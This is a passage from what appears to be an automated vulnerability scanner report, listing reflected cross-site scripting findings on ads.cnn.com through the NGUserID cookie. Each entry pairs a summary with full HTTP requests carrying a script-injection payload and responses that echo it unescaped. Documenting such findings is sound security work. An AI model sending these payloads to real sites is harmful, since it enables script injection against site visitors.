Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph&params.styles=fs&domId=177939&page.allowcompete=yes&domId=177939 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1662fd"><script>alert(1)</script>dd428081f4e; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:54 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:54 GMT
Pragma: no-cache
Content-Length: 3516
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
7,1067,1285,1589,1678,1686,1735,2218,3445,3449,3563,4443,37359,47128,47457,52263,52901,54553,56058,56872,57896,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1662fd"><script>alert(1)</script>dd428081f4e&Redirect=https://subs.timeinc.net/MO/mo_cc08081495.jhtml?">
...[SNIP]...

1.75. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=136756 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=136756

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1759"><script>alert(1)</script>5ab4b1dab41 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=136756 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1c1759"><script>alert(1)</script>5ab4b1dab41; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:44 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:44 GMT
Pragma: no-cache
Content-Length: 3586
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
67,1285,1589,1678,1686,1735,3448,3459,4443,37359,47128,47457,52263,52901,56058,56872,57810,58702,61263,61887,61908,61913,63267,116201,116268,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1c1759"><script>alert(1)</script>5ab4b1dab41%2CTIL%2C1313433990029&Redirect=http://www.money.com">
...[SNIP]...

1.76. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=136756 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=136756

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57083"><script>alert(1)</script>e2de08365d3 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=136756 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-157083"><script>alert(1)</script>e2de08365d3; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:52 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:52 GMT
Pragma: no-cache
Content-Length: 3598
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
5,1589,1678,1686,1735,3448,3459,4443,37359,47128,47457,52263,52901,56058,56872,57810,57896,58702,61263,61887,61908,61913,63267,116201,116268,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-157083"><script>alert(1)</script>e2de08365d3%2CTIL%2C1313434014105&Redirect=http://www.money.com">
...[SNIP]...

1.77. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9135e"><script>alert(1)</script>e208cd85e88 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-19135e"><script>alert(1)</script>e208cd85e88; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:29 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:29 GMT
Pragma: no-cache
Content-Length: 2864
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
47128,47457,48989,52263,52752,52901,52977,54254,56058,56872,57896,58702,60072,60074,60077,60093,60443,61089,61263,61421,61887,61908,61913,63267,116729&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-19135e"><script>alert(1)</script>e208cd85e88%2CTIL%2C1313434106153&amp;random=cbvNphc,bhesArzdoIgcK&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-19135e"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Ee208cd85e88" width="1"
...[SNIP]...

1.78. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dbeb"><script>alert(1)</script>2a7fe7a3786 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-19dbeb"><script>alert(1)</script>2a7fe7a3786; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:22 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:22 GMT
Pragma: no-cache
Content-Length: 2814
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
1589,1678,1686,1735,3458,4443,37359,47128,47457,48989,52263,52752,52754,52901,54254,56058,56872,57896,58702,61089,61263,61887,61908,61913,63267,116729&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-19dbeb"><script>alert(1)</script>2a7fe7a3786%2CTIL%2C1313434106153&amp;random=bbnxujr,bhesArsdoIdxy&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-19dbeb"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E2a7fe7a3786" width="1"
...[SNIP]...

1.79. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=main&cnn_money_position=336x280_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&cnn_money_subsection=homepage&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=637773 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=main&cnn_money_position=336x280_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&cnn_money_subsection=homepage&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=637773

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190ac"><script>alert(1)</script>3f8ba544f57 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=main&cnn_money_position=336x280_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&cnn_money_subsection=homepage&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=637773 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1190ac"><script>alert(1)</script>3f8ba544f57; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:53 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:53 GMT
Pragma: no-cache
Content-Length: 4386
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,3461,3494,3586,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,60072,60074,60077,60093,60443,61263,61421,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1190ac"><script>alert(1)</script>3f8ba544f57%2CTIL%2C1313434014105&Redirect=http://twitter.com/fortunemagazine">
...[SNIP]...

1.80. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=social_sync&cnn_money_position=475x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=480339 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=social_sync&cnn_money_position=475x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=480339

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83c10"><script>alert(1)</script>cf016dd1918 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=social_sync&cnn_money_position=475x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=480339 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-183c10"><script>alert(1)</script>cf016dd1918; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:44 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:44 GMT
Pragma: no-cache
Content-Length: 3563
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
5,1589,1678,1686,1735,3443,3458,4443,37359,47128,47457,52263,52901,56058,56872,57810,58702,61263,61421,61887,61908,61913,63267,116196,116269,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-183c10"><script>alert(1)</script>cf016dd1918%2CTIL%2C1313433990029&Redirect=http://www.money.com">
...[SNIP]...

1.81. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d02ae"><script>alert(1)</script>995fc90c9d2 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
